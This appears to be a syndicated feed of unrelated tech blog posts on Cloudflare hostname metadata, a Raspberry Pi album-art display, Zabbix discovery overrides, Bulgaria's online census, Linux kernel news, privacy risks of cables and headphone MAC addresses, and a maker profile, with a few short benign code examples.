Customers who need to customize their configuration to handle specific rules for their customers’ domains can do so by using Custom Metadata and Workers.

By adding metadata to an individual custom hostname and then deploying a Worker to read the data, you can use the Worker to customize per-hostname behavior.

Some customers use this functionality to add a customer_id field to each custom hostname that they then send in a request header to their origin. Another way to use this is to set headers like HTTP Strict Transport Security (HSTS) on a per-customer basis.
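The per-hostname logic described above can be modelled in a few lines. The sketch below is plain Python rather than a real Worker, and the metadata key `hsts_max_age`, the header name `X-Customer-Id`, and the function name are hypothetical; it only shows how metadata attached to a custom hostname might drive the headers sent to the origin and returned to the client.

```python
from typing import Dict, Tuple


def headers_for_hostname(metadata: Dict[str, str]) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Derive (origin request headers, client response headers) from hostname metadata."""
    request_headers: Dict[str, str] = {}
    response_headers: Dict[str, str] = {}

    # Forward the customer identifier to the origin, if one is set.
    if "customer_id" in metadata:
        request_headers["X-Customer-Id"] = metadata["customer_id"]

    # Enable HSTS only for customers whose metadata asks for it.
    if "hsts_max_age" in metadata:
        response_headers["Strict-Transport-Security"] = f"max-age={metadata['hsts_max_age']}"

    return request_headers, response_headers


req, resp = headers_for_hostname({"customer_id": "12345", "hsts_max_age": "31536000"})
print(req)
print(resp)
```

A hostname without any metadata yields two empty dictionaries, so the default behavior is left untouched.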

Saving the best for last: Analytics!

Tomorrow, we have a very special announcement about how you can now get more visibility into your customers’ traffic and — more importantly — how you can share this information back to them.

Interested? Reach out!

If you’re an Enterprise customer, and you’re interested in any of these features, reach out to your account team to get access today!





Raspberry Pi displays album art on LED matrix

Post Syndicated from Ashley Whittaker original https://www.raspberrypi.org/blog/raspberry-pi-displays-album-art-on-led-matrix/

We’ve seen a few innovative album art displays using Raspberry Pi, from LEGO minifigures playing their own music to this NFC-powered record player.

Redditor u/gonnabuysomewindows was looking for a fun project combining Raspberry Pi and Adafruit’s LED matrix, and has created the latest cool album art display to grace our blog.

Hardware

- Raspberry Pi 3 Model B+

- Adafruit 64×64 RGB LED Matrix

- Adafruit RGB Matrix Bonnet for Raspberry Pi (this also powers the Raspberry Pi)

- 5V 10A switching PSU

- 3D-printed Matrix feet to stand it upright and Raspberry Pi mount to secure the Raspberry Pi to the back

How does it work?

The maker turned to PowerShell – a cross-platform task automation solution – to create a script (available on GitHub) that tells the Raspberry Pi which album is playing, and sends it the album artwork for display on the LED matrix.

Raspberry Pi runs a flaschen-taschen server to display the album artwork. The PowerShell script runs a ‘send image’ command every time the album art updates. Then the Raspberry Pi switches the display to reflect what is now playing. In the demo video, the maker runs this from iTunes, but says that any PowerShell-compatible music player (e.g. Spotify) will work too.
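To give a feel for what a ‘send image’ step involves, here is a minimal Python sketch. It is not the maker’s PowerShell script. It assumes the flaschen-taschen server accepts a binary PPM (P6) image in a single UDP datagram on port 1337; the function names and the hostname in the comment are hypothetical.

```python
import socket


def build_ppm_packet(width: int, height: int, rgb: bytes) -> bytes:
    """Wrap raw RGB pixel data in a binary PPM (P6) header."""
    if len(rgb) != width * height * 3:
        raise ValueError("expected 3 bytes per pixel")
    header = f"P6\n{width} {height}\n255\n".encode("ascii")
    return header + rgb


def send_image(host: str, packet: bytes, port: int = 1337) -> None:
    """Send one image as a single UDP datagram (port 1337 is an assumed default)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(packet, (host, port))


# A solid red 64x64 frame standing in for real album art.
frame = build_ppm_packet(64, 64, bytes([255, 0, 0]) * (64 * 64))
# send_image("raspberrypi.local", frame)  # hypothetical hostname; uncomment to send
```

A 64×64 frame is 12,288 bytes of pixel data plus a short header, which fits comfortably in one datagram.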

Setting up your own LED album art display

The maker’s original reddit post shares a step-by-step guide to follow on the software side of things. And they detail the terminal code you’ll need to run on the Raspberry Pi to get your LED Matrix displaying the correct image.

They also suggest checking out Adafruit’s setup guides for the RGB Matrix Bonnet for Raspberry Pi and for the LED Matrix itself.

The post Raspberry Pi displays album art on LED matrix appeared first on Raspberry Pi.

Lightning Cable with Embedded Eavesdropping

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/09/lightning-cable-with-embedded-eavesdropping.html

Normal-looking cables (USB-C, Lightning, and so on) that exfiltrate data over a wireless network.

I blogged about a previous prototype here.

Extend your Low-level discovery rules with overrides

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/extend-your-low-level-discovery-rules-with-overrides/15496/

Overrides is an often overlooked feature of Low-level discovery that makes the discovery of different entities in your environment so much more flexible. In this blog post, we will take a look at how overrides work and how we can use them to extend our Low-level discovery rules with additional logic.

When it comes to Zabbix, Low-level discovery (also known as LLD) is a vital part of the Zabbix feature set. Automated creation of items, triggers, graphs, and hosts, based on existing entities is invaluable in larger environments, where creating these entities by hand is simply not feasible.

But what about use cases where some of your entities need to be created in a somewhat unique fashion compared to the rest of the discovered entities? Say, one of the items needs to have a unique update interval because it’s more critical than the rest. Or what if some of my network interfaces need to have lower trigger severities since they are not mission-critical?

Before Zabbix 5.0 this used to be a common question – how can I work around use cases like that? The only solution used to be creating separate discovery rules and utilizing LLD filters, for example:

LLD rule A discovers one set of entities with their own properties, and filters out everything else, while LLD rule B discovers the few unique entities that require different configuration parameters while filtering out the entities already discovered by the LLD rule A.

Not very elegant, is it? You can also imagine the LLD rule bloat that would occur in large infrastructures with many unique entities. Thankfully, overrides introduced in Zabbix 5.0 address the question in a very efficient manner.

Low-level discovery overrides

Let’s recall how LLD works. Under the hood LLD is a JSON array with LLD macro and macro value pairs:

[{"{#IFNAME}":"eth0"},{"{#IFNAME}":"lo"},{"{#IFNAME}":"eth2"},{"{#IFNAME}":"eth1"}]

In this small example of an LLD JSON, we can see each of our interfaces next to the LLD macro – these are our discovered entities. With overrides, we can modify objects related to each of these discovered entities.
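To make the structure concrete, the following short Python sketch parses the example JSON above and lists the discovered entities. It runs outside Zabbix and is only meant to show the shape of the data.

```python
import json

lld_json = '[{"{#IFNAME}":"eth0"},{"{#IFNAME}":"lo"},{"{#IFNAME}":"eth2"},{"{#IFNAME}":"eth1"}]'

# Each array element is one discovered entity: a mapping of LLD macro -> value.
entities = json.loads(lld_json)
interfaces = [entity["{#IFNAME}"] for entity in entities]
print(interfaces)  # ['eth0', 'lo', 'eth2', 'eth1']
```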

Overrides are available for each of your LLD rules. Once you open the particular LLD rule, navigate to the “Overrides” tab and add a new override. There are three parts to Overrides:

- Filters define which of the discovered entities we are going to modify with this override. This is done by matching against the contents of a specific LLD macro or simply checking if a specific LLD macro exists for a discovered entity.

- Operation conditions define which of the objects (items, triggers, graphs, hosts) we are going to override for the discovered entity.

- Lastly, we have to define which of the object attributes we are going to change (item update intervals, trigger severity, item history storage period, etc.)

Multiple overrides in a single Low-level discovery rule

In use cases where we have defined multiple overrides in a single LLD rule, there are a few things that we need to consider. First off, the override order does matter! The overrides are displayed in a reorderable drag-and-drop list, so we can change the ordering of the overrides by dragging them around.

Secondly, when configuring an LLD override we can select from two behaviors if the override matches the discovered entity:

- Continue overrides – subsequent overrides for the current entity will be processed.

- Stop processing – subsequent overrides for the current entity will be ignored.

For this reason, the order of our overrides can have a significant impact, especially if we have selected to Stop processing subsequent overrides if one of our overrides matches a discovered entity.
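The effect of ordering can be illustrated with a small simulation. This is a simplified model written for this post, not Zabbix code: the `Override` class, its fields, and the attribute values are hypothetical, and filters are reduced to a single regular expression on {#IFNAME}.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Override:
    name: str
    pattern: str             # regex matched against the {#IFNAME} value
    changes: Dict[str, str]  # attributes to set on the discovered objects
    stop: bool = False       # True models "Stop processing"


def apply_overrides(ifname: str, overrides: List[Override]) -> Dict[str, str]:
    """Walk the overrides in list order and collect changes from those that match."""
    result: Dict[str, str] = {}
    for override in overrides:
        if re.search(override.pattern, ifname):
            result.update(override.changes)
            if override.stop:
                break  # subsequent overrides are ignored for this entity
    return result


all_eth = Override("all eth", r"^eth", {"severity": "Warning"}, stop=True)
eth1_only = Override("eth1 only", r"^eth1$", {"history": "7d"})

print(apply_overrides("eth1", [all_eth, eth1_only]))  # {'severity': 'Warning'}
print(apply_overrides("eth1", [eth1_only, all_eth]))  # {'history': '7d', 'severity': 'Warning'}
```

With the stopping override first, the second override never runs for eth1; swapping the two lets both apply.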

Network interface discovery override

Let’s take a look at an example of how we can use overrides and define unique settings for some of the discovered network interfaces.

Without any overrides, we can see that we are discovering interfaces eth0, eth1, eth2, and lo. All of them have the same update interval and history/trend retention settings. When we open up the trigger section, we can also see that the triggers for all of the interfaces have the same severity settings, all are enabled and discovered.

Discovered triggers without using any overrides

Now let’s implement a few overrides.

- Change severity to high for the eth1 interface down trigger

- Change the history/trend storage period for the items created for the lo interface

Let’s define our first override. We are going to override a trigger prototype for entities where {#IFNAME} matches eth1.

Override only interfaces that match eth1 in the {#IFNAME} macro value

For this entity, we will be changing the severity of the Trigger prototype containing the string “Link down” in the trigger prototype name.

Change trigger severity only for triggers that contain Link down in their name

For our second override let’s change the history and trend storage period on items for the entity where {#IFNAME} matches lo, since storing history data for the loopback interface isn’t critical for us.

Override only interfaces that match lo in the {#IFNAME} macro value

To apply this override on the items created from any item prototype in this discovery rule, my operation condition is going to contain an empty matches pattern.

Change item History/Trend storage period for any item created for the lo interface

Once we re-run the discovery rule, we will see that the changes have been applied to our items and triggers created from the corresponding prototypes.
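The two overrides from this example can be modelled outside Zabbix to see which objects they touch. In the sketch below, the object names, the default severity and storage periods, and the new values (7d, 30d) are illustrative assumptions; the anchored patterns `^eth1$` and `^lo$` are a deliberate choice so that, for instance, an interface named eth10 would not match.

```python
import re
from typing import Dict


def discover(ifname: str) -> Dict[str, dict]:
    """Create objects from prototypes with static defaults (illustrative values)."""
    return {
        "triggers": {f"Interface {ifname}: Link down": "Average"},
        "items": {f"Interface {ifname}: Bits received": {"history": "90d", "trends": "365d"}},
    }


def apply_example_overrides(ifname: str, objects: Dict[str, dict]) -> Dict[str, dict]:
    # Override 1: filter on {#IFNAME} matching eth1, operation on "Link down" triggers.
    if re.search(r"^eth1$", ifname):
        for name in objects["triggers"]:
            if "Link down" in name:
                objects["triggers"][name] = "High"
    # Override 2: filter on {#IFNAME} matching lo; the empty pattern matches every item.
    if re.search(r"^lo$", ifname):
        for name, settings in objects["items"].items():
            if re.search("", name):
                settings.update(history="7d", trends="30d")
    return objects


results = {name: apply_example_overrides(name, discover(name))
           for name in ["eth0", "eth1", "eth2", "lo"]}
print(results["eth1"]["triggers"])
print(results["lo"]["items"])
```

Only the eth1 trigger and the lo items change; eth0 and eth2 keep the prototype defaults.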

Note the lo interface History/Trend storage periods – they have been changed as per our override

Note the eth1 trigger severity – it’s now High, as per our override

This way we can finally create any discovered object with a set of unique properties, despite our object prototypes having static settings. The example above is just a general use case of how we can utilize overrides – there can be many complex scenarios for utilizing overrides, especially if we take the execution order and stop/continue processing settings into account. If you are interested in the full list of changes that we can perform on different objects by using overrides, feel free to take a look at the Overrides section in our documentation.

Hopefully, the blog post gave you a glimpse of the flexibility that the override feature is capable of delivering. If you have an interesting use case for overrides or any questions/comments – you are very much welcome to share those in the comments section below the post!

Comic for 2021.09.07

Post Syndicated from Explosm.net original http://explosm.net/comics/5970/

New Cyanide and Happiness Comic

Online Census 2021

Post Syndicated from original https://yurukov.net/blog/2021/online-census-2021/

The online census starts today and will run until September 17. After that, enumerators will visit every dwelling and address to count everyone in person. If you have completed the census electronically, it is enough to give them the code you will receive by email. Besides saving time, this also reduces contact, which matters under the current conditions.

The census is completed on this page. You register with an email address, your EGN (personal identification number), and your ID card. The email confirming your registration may take a few minutes to arrive, as may the one with the code at the end. It is important to enter in the census form the address where you actually live, not the one where you are registered. Likewise, count only the people who really live there, not relatives who usually live abroad or in another dwelling. Under Articles 39 to 41 of the Census Act, all data collected through this questionnaire or otherwise for the purposes of the census is a statistical secret: it cannot be used for anything else, will not be provided to other authorities, and cannot be used as evidence before the executive or the judiciary.

My advice is to check the data entered on each page carefully. You can go back and make corrections, but only before you have pressed “Запазване” (Save) on the last page. On the other hand, much of the information is filled in automatically, for example date of birth or family relationships. Don’t forget to copy the number shown at the end as well. You should receive it by email, and you can also log in to the portal and find it in your profile: click the person icon at the top right and then “Профил” (Profile).

As part of the census there will also be a survey asking what makes us stay in or leave Bulgaria, as well as whether, how many, and when we want children. It will be conducted among 44,000 randomly selected addresses and aims to give a picture of the mood in the country.

The census as a whole is extremely important for many aspects of our lives. It underpins things like budget planning, research that influences investment, and the electoral process. It may even lead to a redistribution of seats in parliament. Above all, though, it shows us what the situation in the country is and helps debunk misconceptions. Ten years ago I published charts of the ethnic composition of the population based on the previous census. Census data underlies my analyses of the birth rate over the last 50 years, of child benefits and poverty, and of mortality and how we compare it across the years. It also helped in presenting the data on Bulgarian children born abroad.

There is regular criticism of how the census is conducted, how the population is tracked, and whether the numbers match reality at all. The last census did indeed bring a downward correction in the population, of 1.82%. That is within the statistical margin of error and close to the correction seen in Germany, for example, at their census. I have already described the Germans’ problems with counting our diaspora. There was also particular criticism of the self-identification questions, namely that anyone could write whatever they wanted. That is in fact the whole idea of “self-identification”. Enumerators cannot go from house to house pinning an ethnicity and labels on the people in front of them.

Because of the pandemic, the wider adoption of internet services in Bulgaria, and the information campaign by the NSI (National Statistical Institute), significantly more people are expected to complete the census online this time. It would be a considerable success, and telling of our internet literacy, if we manage to reach 50%. Many doubt that, however. If you can, help your relatives complete the census too, to save them time and unnecessary contact with the enumerators.

The post Online Census 2021 first appeared on Блогът на Юруков.

Reminder: linux.conf.au 2022 Call for Sessions open + Extended

Post Syndicated from original https://lwn.net/Articles/868500/rss

The linux.conf.au organizers have put out a second, extended call for proposals for the 2022 event, which will be held online starting January 14.

Please submit a talk, join us in January. We have the “venue” sorted, sponsors organised, miniconfs chosen, keynotes ready, now all we need is a wonderful program of sessions for our community to listen and watch.

Proposals are due by September 12.

[$] More IOPS with BIO caching

Post Syndicated from original https://lwn.net/Articles/868070/rss

Once upon a time, block storage devices were slow, to the point that they often limited the speed of the system as a whole. A great deal of effort went into carefully ordering requests to get the best performance out of the storage device; achieving that goal was well worth expending some CPU time. But then storage devices got much faster and the equation changed. Fancy I/O-scheduling mechanisms have fallen by the wayside and effort is now focused on optimizing code so that the CPU can keep up with its storage. A block-layer change that was merged for the 5.15 kernel shows the kinds of tradeoffs that must be made to get the best performance from current hardware.

Creating Lens Flare and Bokeh with Vintage Lenses

Post Syndicated from Matt Granger original https://www.youtube.com/watch?v=E9g9Z-1Jc14

Security updates for Monday

Post Syndicated from original https://lwn.net/Articles/868464/rss

Security updates have been issued by Debian (btrbk, pywps, and squashfs-tools), Fedora (libguestfs, libss7, ntfs-3g, ntfs-3g-system-compression, partclone, testdisk, wimlib, and xen), Mageia (exiv2, golang, libspf2, and ruby-addressable), openSUSE (apache2, dovecot23, gstreamer-plugins-good, java-11-openjdk, libesmtp, mariadb, nodejs10, opera, python39, sssd, and xerces-c), and SUSE (apache2, java-11-openjdk, libesmtp, mariadb, nodejs10, python39, sssd, xen, and xerces-c).

The 1947 Centralia Mine Disaster

Post Syndicated from The History Guy: History Deserves to Be Remembered original https://www.youtube.com/watch?v=BwvpAlvM-SA

Tracking People by their MAC Addresses

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/09/tracking-people-by-their-mac-addresses.html

Yet another article on the privacy risks of static MAC addresses and always-on Bluetooth connections. This one is about wireless headphones.

The good news is that product vendors are fixing this:

Several of the headphones which could be tracked over time are for sale in electronics stores, but according to two of the manufacturers NRK have spoken to, these models are being phased out.

“The products in your line-up, Elite Active 65t, Elite 65e and Evolve 75e, will be going out of production before long and newer versions have already been launched with randomized MAC addresses. We have a lot of focus on privacy by design and we continuously work with the available security measures on the market,” head of PR at Jabra, Claus Fonnesbech says.

“To run Bluetooth Classic we, and all other vendors, are required to have static addresses and you will find that in older products,” Fonnesbech says.

Jens Bjørnkjær Gamborg, head of communications at Bang & Olufsen, says that “this is products that were launched several years ago.”

“All products launched after 2019 randomize their MAC-addresses on a frequent basis as it has become the market standard to do so,” Gamborg says.

EDITED TO ADD (9/13): It’s not enough to randomly change MAC addresses. Any other plaintext identifiers need to be changed at the same time.



Meet Geeky Faye: maker, artist, designer, and filmmaker

Post Syndicated from Ashley Whittaker original https://www.raspberrypi.org/blog/meet-geeky-faye-maker-artist-designer-and-filmmaker/

An artist and maker, Geeky Faye describes themself as a one-man band, tackling whole areas of creation. In the latest issue of The MagPi Magazine, Rob Zwetsloot meets the cosplaying polymath.

Having multiple hobbies and interests can be fun, but they can sometimes get on top of you. Allie, also known online as Geeky Faye, seems to have thrived with so many. “As it currently stands, I will happily refer to myself as a maker, artist, designer, and filmmaker because all of those are quite accurate to describe the stuff I do!” Allie tells us.

“I’ve been making almost my whole life. I dove headlong into art as a young teen, to be quickly followed by cosplay and building things that I needed for myself. I would go on to get a degree in fine arts and pursue a professional career as an artist, but that actually ended out resulting in me being on a computer all day more than anything! I’ve always needed to use my hands to create, which is why I’ve always been drawn to picking up as many making skills as possible… These days my making is all very ‘multimedia’ so to speak, involving 3D printing, textiles, electronics, wood working, digital design, and lots of paint!”

When did you learn about Raspberry Pi?

I’d heard about Raspberry Pi years ago, but I didn’t really learn about it until a few years back when I started getting into 3D printing and discovered that you could use one to act as a remote controller for the printer. That felt like an amazing use for a tool I had previously never gotten involved with, but once I started to use them for that, I became more curious and started learning a bit more about them. I’m still quite a Raspberry Pi novice and I am continually blown away by what they are capable of.

What have you made with Raspberry Pi?

I am actually working on my first ever proper Raspberry Pi project as we speak! Previously I have only set them up for use with OctoPrint, 3D-printed them a case, and then let them do their thing. Starting from that base need, I decided to take an OctoPrint server [Raspberry] Pi to the next level and started creating BMOctoPrint; an OctoPrint server in the body of a BMO (from Adventure Time). Of course, it would be boring to just slap a Raspberry Pi inside a BMO-shaped case and call it a day.

So, in spite of zero prior experience (I’m even new to electronics in general), I decided to add in functionality like physical buttons that correspond to printer commands, a touchscreen to control OctoPrint (or anything on Raspberry Pi) directly, speakers for sound, and of course user-triggered animations to bring BMO to life… I even ended out designing a custom PCB for the project, which makes the whole thing so clean and straightforward.

What’s your favourite project that you’ve done?

Most recently I redesigned my teleprompter for the third time and I’m finally really happy with it. It is 3D-printable, prints in just two pieces that assemble with a bit of glue, and is usable with most kinds of lens adapters that you can buy off the internet along with a bit of cheap plastic for the ‘glass’. It is small, easy to use, and will work with any of my six camera lenses; a problem that the previous teleprompter struggled with! That said, I still think my modular picture frame is one of the coolest, hackiest things that I’ve made. I highly recommend anyone who frames more than a single thing over the course of their lives to pick up the files, as you will basically never need to buy a picture frame again, and that’s pretty awesome, I think.

Subscribe to Geeky Faye Art on YouTube, and follow them on Twitter, Instagram, or TikTok.

Get The MagPi #109 NOW!

You can grab the brand-new issue right now from the Raspberry Pi Press store, or via our app on Android or iOS. You can also pick it up from supermarkets and newsagents. There’s also a free PDF you can download.

The post Meet Geeky Faye: maker, artist, designer, and filmmaker appeared first on Raspberry Pi.